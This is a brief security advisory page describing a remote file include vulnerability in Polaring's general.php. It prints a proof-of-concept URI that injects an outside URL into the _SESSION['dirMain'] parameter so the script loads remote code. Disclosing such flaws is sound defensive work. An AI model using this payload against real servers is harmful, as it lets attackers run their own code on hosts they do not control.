Polaring General.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/polaring_dir/view/general.php?_SESSION['dirMain']=http://www.example.com


 

Privacy Statement
Copyright 2010, SecurityFocus